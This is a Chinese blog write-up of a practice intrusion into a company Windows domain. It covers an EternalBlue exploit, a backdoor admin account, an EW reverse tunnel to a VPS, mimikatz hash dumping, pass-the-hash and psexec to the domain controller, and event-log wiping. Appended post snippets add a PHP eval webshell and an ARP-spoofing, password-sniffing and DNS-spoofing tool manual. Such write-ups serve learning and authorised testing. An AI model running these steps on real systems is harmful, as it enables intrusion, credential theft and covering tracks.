记一次简单的内网渗透

最新推荐文章于 2025-04-05 17:22:19 发布
最新推荐文章于 2025-04-05 17:22:19 发布
阅读量1.5k 收藏 8
点赞数
分类专栏: 后渗透、内网学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_41598660/article/details/106843352
版权

起因

在这里插入图片描述

本人这次实验过程

回公司后连wifi已经相当于进入内网环境→对目标进行端口扫描→存在高危端口139、445(永恒之蓝)、3389(19年RDP)→poc验证存在漏洞并用msf打exp,只成功了一次→对成功的一次把握住机会对222主机添加了账号密码并提升为管理员权限→因为发烧去不了公司,罗哥给了我跳板机→利用跳板机代理流量→访问222机子,下载mimikatz抓取密码→登录到222机子的域身份→发现是域管→用哈希传递、psexec横向连接到域控→清理痕迹。

和目标机同一局域网

Nmap对内网ip 192.168.1.222进行端口的扫描发现存在445端口
在这里插入图片描述

使用namp的永恒之蓝poc进行验证nmap --script smb-vuln-ms17-010
在这里插入图片描述

使用msf的反向shell进行攻击,但之前要先关闭本机的防火墙,因为目标机器shell的反弹可能会被本机防火墙挡住
在这里插入图片描述

启动msfconsole模块设置目标ip并尝试进行攻击
在这里插入图片描述

第一次没打成功,尝试下用正向连接windows/meterpreter/bind_tcp
但是后边几次都是失败的了。还好先前打进去的时候添加了3389远程连接的账号和密码
ou Ojf123456并且设置为管理员权限,因为打进去的shell就是管理员的权限,不需要进行提权。

判断主机是否存在域,存在域但不是域用户
在这里插入图片描述
主DNS后缀wenson.com可能是域名字?
在这里插入图片描述
对192.168.1.222这台主机进行远程连接后 ipconfig /all查看网卡信息
在这里插入图片描述
Systeminfo 确定了域为god,本机的域ip为192.168.52.143
在这里插入图片描述

net config workstation 原来wenson.com只是主机名后缀?可以百分百确定存在域是god
在这里插入图片描述

探测域内存活主机(不禁ping)
for /l %i in (1,1,255) do @ ping 192.168.52.%i -w 1 -n 1|find /i “ttl=”
在这里插入图片描述

nbtscan.exe对域内存活主机进行探测
在这里插入图片描述
如果机子存在域,虽然3389进去的用户不是域用户,但是也可以对域进行信息收集
但是机子不存在域,就不能对域进行信息收集,本质是通过LDAP协议
查询存在多少个域 net view /domain
在这里插入图片描述
查询这god域存在多少台主机
在这里插入图片描述
查资域控制器 nltest /DCLIST:god
在这里插入图片描述
可以很确定:
内网god域环境中有三台服务器。其中被拿下权限的是STU1(192.168.52.143)
其他两台分别是 域控DC :192.168.52.138 (OWA)192.168.52.141(ROOT-TVI862UBEH) 域管有可能就是本机,但是没有administrator的密码。所以想办法用工具抓一下本机密码。

后来导师回来,去看他们的PK项目复盘。第二天就发烧了。但导师给了个跳板机给我。于是可以想办法利用跳板机再进行对STU1这个机子进行操作。

对跳板机进行流量转发操作记录

本地ssh连接进去后查看防火墙状态
在这里插入图片描述
继续信息收集 查看其余d盘文件,有很多想法
在这里插入图片描述
最后还是老老实实,想办法上传文件 利用sftp,用put方法,然后是本地电脑的物理路径,还真的上传成功了
在这里插入图片描述
上传ew文件
在这里插入图片描述
同样的操作上传对应ew的linux文件到自己的vps中
在这里插入图片描述
跳板机操作
ew_for_Win.exe -s rssocks -d vps的ip -e 8888
在这里插入图片描述
vps操作
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
在这里插入图片描述
配置Proxifier直接实现成功!主机通过连接公司内网192.168.1.222的3389端口连接成功!
在这里插入图片描述
在这里插入图片描述
注意事项,vps的安全组端口要设置出入站规则,不然反向代理的时候,可能因为安全组端口的问题导致失败。ew执行不了的时候,要进行chmod 777 赋予权限。

横向渗透

进入之后mimikatz抓一下密码,发现存在Administrator,在god域。的确我3389创建的账号只是在本机的一个工作组,所以先得要登录到god/Administrator这个域账号中
在这里插入图片描述
在这里插入图片描述

终于能登录回有域身份的用户上了
在这里插入图片描述

现在得重新确认下222机子的身份到底是域管还是普通域成员
在这里插入图片描述

是域管,如果有域管权限而且有他的ntlm值,是可以进行一个哈希传递的。
F0e757401ff7862e0efe335f3b59e174
在这里插入图片描述

  • 利用mimikatz进行哈希传递
    在这里插入图片描述
    然后自动弹出来一个框,使用net和dir命令,执行成功。
    在这里插入图片描述
  • Psexec攻击
    在这里插入图片描述
    连接到域控cmd确定下是否域控
    在这里插入图片描述

清理痕迹

清理利用222机子下载的东西压缩包
在这里插入图片描述
清除浏览器使用痕迹
在这里插入图片描述
对操作的时间进行筛选并清除操作当天的所有日志,应用程序、安全、系统。
在这里插入图片描述

总结

很感谢罗哥提供了我这个公司的域环境进行操作,学习内网渗透也没有几天,第一次真正意义上的实现了从公网到内网,而不是本地到靶机。进步了很多,但是这样还是没用的,许多步骤基本都是在用工具,内网情景是复杂的,还有许多的理论像kerbros、路由、多层代理和实战要继续学,甚至连CS、Powershell、empire这类工具也没开始接触,惆怅是没用的,眼看已经晚上接近凌晨,想想未来的路要怎么走,怎么学,狗命重要还是爬上床了。

思考和延申

msf如何进行多层代理?
如何利用域普通成员进行一个横向?
虽然说exp打不成功,但是msf生成的马可以传上去把跳板机的shell先转过来,然后再打222机子
拿到域控后还要如何进行后续操作?
CS、Powershell、empire这类工具是什么,内网环境如何利用?

一次内网渗透过程学习|天磊卫士
Uguardsec的博客
12-30 708
一次内网渗透过程学习
一次内网渗透
wulanlin的博客
12-27 631
webshell 访问某网站,该网站利用的是FineCMS v5系统建站,创建一个新的用户进行测试。 通过建站系统存在的漏洞进行webshell,利用FineCMS v5 的文件上传漏洞,获取官网系统的Webshell。 上传一句话木马文件,并且通过burpsuite软件抓包来修改参数 <?php eval($_POST['v']); ?> 最开始的文件格式是0x0.png 通过burp代理拦截将tx后面的image/png换成image/php即可 访问.
【网络安全】(黑客)内网渗透基础知识(超详细!)
最新发布
小陈的博客
04-05 1283
内网也指局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的历程安排、电子邮件和传真通信服务等功能。内网是封闭型的,它可以由办公室内的两台计算机组成,也可以由一个公司内的上千台计算机组成。列如银行、学校、企业工厂、政府机关、网吧、单位办公网等都属于此类。
内网一次成功的内网渗透
shy的博客
10-09 1126
虚拟网卡配置 环境问题: 虚拟机桥接获取不到IP地址,通过还原默认设置,指定物理网卡解决 靶机1,内网网卡获取不到IP地址,通过添加配置文件解决。 开始渗透: Kali:192.168.1.13 Centos7:192.168.1.16 192.168.22.11 扫端口 使用nmap 顺便扫漏洞 nmap -sS -A 192.168.101.91 --script=vuln 比较慢,没有截图 访问80 测试宝塔未授权访问漏洞,不存在 查看robots...
一次某单位的内网渗透测试
黑战士的博客
06-20 777
网卡信息、补丁信息、杀毒进程、用户在线情况、是否存在域、翻文件查找数据库密码、浏览器保存密码、查看路由等。使用越权加文件上传拿到shell。192.168.xx.x 管理员。通过哥斯拉上线msf。
内网渗透一次录 作者:Jaky.pdf
04-08
本文基于《内网渗透一次录》这一实战案例,详细解析了内网渗透的具体步骤和技术要点。 #### 二、环境准备 在进行内网渗透之前,需要做好充分的准备工作。主要包括生成远控木马、部署木马以及设置监听环境等...
cs linux内网渗透,一次利用cs进行内网渗透的过程
weixin_29497981的博客
05-15 1229
一次利用cs进行内网渗透的过程​首先搭建好cs的服务端和客户端连接,下面正式进行渗透环境kali:192.168.0.226域控机:192.168.0.138成员机:192.168.0.251 192.168.0.141操作cs上线首先开启监听cobalt->listeners,host和beacons都为cs服务端的ip地址生成相应的windows木马,上传到靶机251中执行。选择对应的...
一次国外某内网的实战过程.pdf
11-25
WEB安全、内网渗透
一次内网靶场渗透WP
include_voidmain的博客
04-19 3220
0x01 前言 此次靶场渗透思路,攻击者通过VPS(kali-linux)服务器以WEB_1-(ubuntu,双网卡)为入口。 横向到一个WEB_2(windows 7,双网卡)通过双网卡进行横向探测,发现OS_3,利用目标存在的系统漏洞获取目标系统权限。 0x02 靶场拓扑 0x03 渗透过程 访问WEB_1服务器地址: http://192.168.28.135发现为JunAMS 扫描后台管理地址成功获取地址: http://192.168.28.135/admin.php并成功跳转至管理页面。 J
局域网渗透
01-03
局域网渗透软件 usage: hijack <-LVXhefvqsxrkHDtNzoi> <-d dev> <-S interval> <-l logfile> <-W normal|byline|none> <-F jobfile> <-p port> <-c http_flag> <-IO pcap_dump> <-E quit time> <-R reboot time> <-b submask> <-m speed> <Source Host> <Dest Host> <match expression> <bpf filter> | <genuine host> <faked host> -h is help/usage 显示帮助信息 -V is version information 显示版本信息 -v is be verbose 程序运行时显示详细信息 -q is be quiet (don't print packet reception hash marks) 安静模式,不显示数据包标识 -e is show empty packets 显示空的数据包 -o is fixed '\0' after replace data offset 替换数据后,被替换的数据后都用空字节'\0'填充 -i is ignore case 忽略大小写进行匹配 -S is spoof interval default is 3000 ms 设置发送RARP欺骗的时间间隔,不能设太大,不然程序会死,条件竞争问题 针对攻击一些反ARP欺骗的主机, 越小越好 -l is set logfile to record 设置日专录文件,日志录文件将程序运行输出的内容再录的文件里 -r is enabled ip routing 开启系统内置的路由功能,只能嗅探,不能修改数据包 -b is to force define submask 强制指定子网掩码,对一些跨网段的欺骗有效 -m is define max transmit speed k/s 限制最大网络传输速度 k/s -f is set full spoof-route mode default is half 设置欺骗方式为双向欺骗 -x is print in alternate hexdump format 打印出来的数据为十六进制 -X is interpret match expression as hexadecimal 设置要匹配的字串为十六进制,如0x0d0a00 -p is the port to hijack 设置要进行数据劫持的端口,默认为全部 -c is the flag string to insert for http hijack 要插入代码的HTTP响应包的特征字符串,默认为200 OK -I is read packet stream from pcap format file pcap_dump 从一个pcap数据包格式的文件里读取数据包,进行离线嗅探 -D is dnsspoof mode 模式改变为DNS欺骗,规则文件格式不变 -t is print timestamp every time a packet is matched 当有匹配的数据包时,打出时间戳 -E is time to quit # 程序自动退出的时间间隔,按秒计算 -R is time to reboot program # 程序自动重新启动的时间间隔,按秒计算 -N is release demo job file 释放一规则文件 -s is scan hosts in subnet 扫描子网 -H is hidden from console, background mode killed /k 从控制台隐藏到后到执行,可以用hijack -k 结束 -k is killed a exists instance 结束一个存在的实例 -O is dump matched packets in pcap format to pcap_dump 保存匹配的数据包到一个pcap数据包格式的文件里 -W is set the dump format (normal, byline, none) 设置数据包显示的格式,一般,按行,无格式三种 -F is read the filter from the specified file 从指定的文件里读取规则 -z is IP faked mode genuine and faked host variable auto switch full spoof# 进行IP伪造genuine host 和 faked host生效, 自动打开全双工选项 -d is use specified device (index) 使用指定网卡的索引号 -L is show the winpcap device list index 显示网卡列表 ______________________________________________________________________________________________________________________ // 常用功能举例说明 显示网卡列表 hijack /L 扫描子网 hijack /sd3 结束一个现有的实例 hijack /k ______________________________________________________________________________________________________________________ // 嗅探功能举例说明 嗅探子网,程序自动转发 (可以匹配,但不能设置过滤规则) hijack /d3 192.168.16.* 192.168.16.1 嗅探子网,同上, 双向欺骗 hijack /fd3 192.168.16.* 192.168.16.1 嗅探子网,同上,退出Console, 进入后台运行 hijack /Hfd3 192.168.16.* 192.168.16.1 嗅探子网,同上,退出Console, 进入后台运行, 120秒后程序自动退出 hijack /Hfd3 /E 120 192.168.16.* 192.168.16.1 嗅探子网,同上,退出Console, 进入后台运行, 120秒后程序自动重新运行 hijack /Hfd3 /R 120 192.168.16.* 192.168.16.1 嗅探子网,程序自动转发,发送RARP欺骗包间隔为100微秒 hijack /d3 /S 100 192.168.16.* 192.168.16.1 嗅探子网,同上, 强制指定子网掩码为255.255.255.0 hijack /d3 /S 100 /b 255.255.255.0 192.168.16.* 192.168.16.1 嗅探子网,系统自动转发 (效率高, 可以设置BPF规则) 以下为嗅探FTP密码 "|" 为条件分隔符 hijack /rqd3 192.168.16.* 192.168.16.1 "USER|PASS" "tcp and dst port 21" 同上,将信息保存到pass.log里,pass.log里有详细的FTP密码信息 hijack /rqd3 /l pass.log 192.168.16.* 192.168.16.1 "USER|PASS" "tcp and dst port 21" 嗅探子网,一些常见的HTTP密码, 不区分大小定(i选项打开), 保存数据包到pass.dat里 hijack /rqid3 /O pass.dat 192.168.16.* 192.168.16.1 "username=|password=" "tcp and dst port 80" 还原数据包数据,程序将显示嗅探到的数据包 hijack /I packet.dat 自定义要嗅探的主机用","分隔,如: hijack /rd3 192.168.16.3,192.168.16.8,192.168.16.10-20 192.168.16.1 ______________________________________________________________________________________________________________________ // 数据包修改功能举例说明 释放一个替则文件 hijack /N 释放的文件如下: ---- gzip ---- gxip ---- http-insert ---- <center>hijack</center> ---- 程序以"----"为分隔符,第一个字符串为原字符串,第二个字符串为替换后的字符串,最大长度都为256字节, 往下再重复 如果是原字符串为http-insert,表始要进行HTTP会话劫持,程序将下一条字符串插入到HTTP响应包里 劫持网关到子网之间的数据, 并显示详细信息 hijack /vd3 /p 80 /S 100 /F job.txt 192.168.16.1 192.168.16.* 修改后的数据用'\0'字符填充 hijack /vod3 /p 80 /S 100 /F job.txt 192.168.16.1 192.168.16.* 修改后的数据用'\0'字符填充 hijack /vod3 /p 80 /S 100 /F job.txt /c "404" 192.168.16.1 192.168.16.* ______________________________________________________________________________________________________________________ // DNS欺骗说明, 需打开-D选项 DNS欺骗与数据包修改唯一不同的就是规则文件,一个实例的DNS欺骗需要用的规则文件如下 ---- www.163.com ---- 192.168.16.3 ---- * ---- 192.168.16.1 ---- 欺骗后 就把www.163.com的IP解析成了192.168.16.3, 其它所有的都解析为192.168.16.1 DNS欺骗www.163.com为192.168.16.3 规则文件dns.txt如下 ---- www.163.com ---- 192.168.16.3 ---- 命令如下: hijack /Dvd3 /F dns.txt 192.168.16.* 192.168.16.1 注意: 实例中dns查询包是从内网到外网发送的,所以欺骗方向要注意 ______________________________________________________________________________________________________________________ // IP欺骗说明, 需打开-z选项 hijack /zd3 202.108.22.33 202.108.22.1 61.163.83.11 202.102.245.9 实例是在公网上实现的,如果202.108.22.33的21端口做了IP限制,只允许202.102.245.9访问(可以嗅探得到) 攻击者IP是61.163.83.11,则可以通到上面的命令突破IP限制 ______________________________________________________________________________________________________________________ // 网速限制说明 限制子网网速为20K/S, 本机不在统计内 hijack /fd3 /m 20 192.168.16.* 192.168.16.1 很好用的
wce内网渗透
03-23
用于内网渗透 抓去密码 抓到管理密码 打开内网 突破
局域网渗透的一些小工具(支持win7)
10-31
一些内网的,命令行格式的工具,可以来看看,很简单
一次靶机内网渗透
qq_64201116的博客
09-21 1008
发现3389远程桌面连接端口是开放的,可是我们如果直接连接会发现是一个Windows2003的服务主机。那么有没有可能这个密码是相同的,因为都在同一个内网中,管理员可能是同一人。这样子就相当于10086端口在目标主机的服务器的内网中了,可以直接连接本地(直接连接内网地址)如果3389端口没有映射,除了拿下目标连接的路由器,还有一种方法:自己连接自己。这里的问题就是端口映射了,目标机的3389端口在公网的映射端口并不是3389。这里采用第三种方法。于此同时,我们需要一个代理软件来帮我们把py的数据给PHP。
内网渗透
Index优快云的博客
11-06 657
寻找目标主机 ifconfig 接下来扫描内网中的主机: nmap -sP 172.17.171.0/24 使用以下命令来查看目标主机的操作系统信息: nmap -O 172.17.171.21 进行arp欺骗,获取流量 开启流量转发功能 使流量经过流程为: A是路由器,B是攻击主机,C是目标主机。 1.首先开启流量转发功能: echo 1 &gt;&gt; /proc/...
只用一个WiFi,渗透进企业全部内网
weixin_30763455的博客
09-15 480
近年来,黑客通过企业无线网络发起的企业内网渗透事件频发,在某漏洞平台检索时发现仅2015年便发生了数十起知名企业因WiFi相关安全问题导致内网被入侵的事件,对企业造成了十分恶劣的影响。 到了2016年,无线网络已经成为企业移动化办公的重要基础设施,但这些无线网络普遍缺乏有效的管理,无线网络也越来越多的成为黑客入侵企业内网的突破口。 天巡实验室在今年上半年对几个大中型企业进行了...
内网渗透技术的过程
qq_38950485的博客
07-13 2106
环境:linux     这里先不写怎么进入这个局域网。假设已经在这个局域网内了。    基本原理:arp欺骗
内网渗透基础知识点总结(一)
weixin_30912051的博客
07-07 1812
发现自己对于一些内网、域基本的知识有的小地方也是模糊不清,重新梳理和总结一遍 这里总结下基础知识 内网概述 工作组 域 活动目录(AD) DC和AD区别 安全域划分 域中计算机分类 域内权限解读 内网概述 内网也指 局域网( Local Area Network , LAN ) 是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文...
内网渗透实战:从Webshell到权限提升
"内网渗透一次录 作者:Jaky" 本文主要介绍了作者Jaky进行内网渗透的实战过程,旨在分享内网渗透技术及其步骤。文章首先强调了在渗透测试中,通常先获取到低权限的Webshell或反弹shell,随后需要提升权限并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值